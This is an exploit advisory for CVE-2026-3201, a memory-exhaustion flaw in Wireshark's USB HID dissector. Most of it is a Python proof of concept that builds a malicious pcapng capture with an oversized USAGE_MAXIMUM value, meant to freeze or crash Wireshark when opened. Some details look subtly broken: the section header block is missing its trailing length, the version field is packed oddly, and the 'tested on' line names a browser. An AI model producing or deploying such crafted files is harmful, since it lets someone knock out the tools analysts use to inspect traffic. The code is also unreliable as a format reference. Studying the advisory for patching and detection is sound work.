📄 Wireshark USB HID Protocol Dissector Memory Exhaustion

=============================================================================================================================================
    | # Title     : Wireshark 4.6.0 to 4.6.3, 4.4.0 to 4.4.13 USB HID Protocol Dissector Memory Exhaustion                                      |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://www.wireshark.org/                                                                                                  |
    =============================================================================================================================================
    
    [+] Summary    :  CVE-2026-3201 is a Denial-of-Service (DoS) vulnerability affecting the USB HID protocol dissector in Wireshark versions:
    
    4.6.0 through 4.6.3
    
    4.4.0 through 4.4.13
    
    The vulnerability is triggered when Wireshark parses a specially crafted USB HID Report Descriptor containing an excessively large USAGE_MAXIMUM value.
    
    When such a malformed capture file (e.g., PCAPNG with USBPcap link type 249) is opened, the dissector attempts to allocate memory based on the attacker-controlled value. 
    
    Due to insufficient bounds checking, this can cause uncontrolled memory growth (e.g., via internal array expansion such as wmem_array_grow()), leading to:
    
    Excessive memory consumption
    
    Application freeze
    
    Application crash
    
    [+] Vulnerability Type : Category: Denial of Service (DoS)
    
    [+] POC   :  
    
    import struct
    from scapy.all import *
    
    def generate_perfect_exploit():
        print("[*] Building Refined Malicious USB HID Payload...")
    
        malicious_hid = (
            b"\x05\x01"            
            b"\x09\x06"          
            b"\xa1\x01"            
            b"\x19\x00"            
            b"\x2b\x00\x00\x00\x10" 
            b"\xc0"                 
        )
    
        header_len = 27
        data_len = len(malicious_hid)
        total_len = header_len + data_len
        usb_header = struct.pack("<H Q H B B B B I", 
            header_len,         
            0xDEADBEEFCAFEBABE,  
            1,                   
            1,                   
            0x80,               
            0x02,               
            ord('C'),           
            data_len             
        )
        usb_header += b"\x00" * (header_len - len(usb_header))
        full_pkt = usb_header + malicious_hid
        with open("wireshark_usb_dos_fixed.pcapng", "wb") as f:
            f.write(struct.pack("<I I I I Q", 0x0A0D0D0A, 0x1C, 0x1A2B3C4D, 0x00010000, 0xFFFFFFFFFFFFFFFF))
            f.write(struct.pack("<I I H H I", 0x00000001, 0x14, 249, 0, 0x00000000)) 
            epb_body = struct.pack("<I I I I I", 0, total_len, total_len, 0, 0) + full_pkt
            pad = (4 - (len(epb_body) % 4)) % 4
            epb_total_len = len(epb_body) + 12 + pad      
            f.write(struct.pack("<I I", 0x00000006, epb_total_len)) # Type & Total Length
            f.write(epb_body + (b"\x00" * pad))
            f.write(struct.pack("<I", epb_total_len)) # Total Length footer
    
        print("[!] Success: 'wireshark_usb_dos_fixed.pcapng' generated.")
        print("[*] Logic: USAGE_MAX (0x10000000) will trigger wmem_array_grow() exhaustion.")
    
    if __name__ == "__main__":
        generate_perfect_exploit()
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================